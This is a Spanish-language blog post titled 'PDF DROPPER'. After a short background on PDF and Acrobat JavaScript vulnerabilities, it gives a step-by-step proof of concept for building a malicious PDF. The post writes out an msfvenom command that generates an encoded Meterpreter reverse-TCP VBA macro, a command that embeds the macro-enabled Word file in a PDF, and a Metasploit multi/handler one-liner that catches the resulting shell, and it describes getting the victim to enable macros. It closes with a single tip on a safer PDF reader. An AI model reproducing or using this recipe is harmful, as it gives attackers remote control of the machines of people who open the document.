jueves, 25 de mayo de 2017

PDF DROPPER

 

Descripción:

En la actualidad, el formato PDF (Portable Document Format) de Adobe se utiliza con mucha frecuencia para intercambiar documentos digitales. Sin embargo, existen numerosas vulnerabilidades vinculadas a este formato de archivo. El sitio http://www.securityfocus.com recoge más de 150 CVE (Common Vulnerabilities and Exposures) para Acrobat Reader, el lector de PDF desarrollado por Adobe. Viendo lo extendido que está su uso y las vulnerabilidades que tiene, sin duda el PDF constituye una puerta de entrada a los sistemas. De este modo, los desarrolladores de malwares seleccionan, con frecuencia, este formato para difundir sus programas maliciosos.

Los usuarios empiezan a conocer los riesgos que corren si ejecutan archivos binarios desconocidos en su sistema operativo. Por el contrario, pocos son conscientes de que un documento PDF también puede ejecutar acciones maliciosas sobre sus máquinas. Los archivos en formato multimedia se utilizan, generalmente, sin prestar una especial precaución.

La mayoría de las vulnerabilidades sobre este formato se encuentran en el motor JavaScript presente en Acrobat Reader. En efecto, el formato PDF permite desarrollar código JavaScript incluso en el interior de un archivo para, por ejemplo, manipular automáticamente los formularios. Estas funcionalidades las utilizan algunas administraciones para simplificar la gestión de los formularios y de los informes.

En el caso de un archivo PDF, la primera etapa del análisis consiste en recuperar el código JavaScript sospechoso. La segunda etapa consistirá en comprender este código.

PoC:

Comenzamos por crear nuestra macro maliciosa para MS Word, para ello hacemos uso del payload  windows/meterpreter/reverse_tcp y del encoder shikata_ga_nai con 3 iteraciones:
$ msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 3 lhost=<IPLOCAL> lport=8080 -f vba-exe> /var/www/html/macro

Lo metí en la carpeta de apache para copiar el macro más rapido

Lo siguiente será abrir un documento en MS Word y añadir el código generado en VBS:

En el macro creado vendrán las instrucciones de como configurarlo todo

Embebemos el archivo Word en el PDF:
python make-pdf-embedded.py -m "Prueba" -a Doc1.docm prueba.pdf

make-pdf-embedded.py es una herramienta gratuita que se puede descargar aqui

Y ponemos a la escucha nuestro multi/handler:
$ msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <IP>; set LPORT 8080; run;"

Al abrir el PDF (Necesaria aprobación por parte del usuario) nos preguntará si queremos abrir el documento, le damos a que sí y una vez lo haya abierto nos preguntará si queremos habilitar las macros, le damos a que sí.

 Aprobación por parte del usuario

Una vez habilitadas las macros del archivo Word nos abrirá una sesión meterpreter:


Para estar más seguros en el mundo os recomiendo este lector de pdf ya que no ejecuta código JS y además es muy liviano.

Previous Post
Next Post

post written by:

0 comentarios: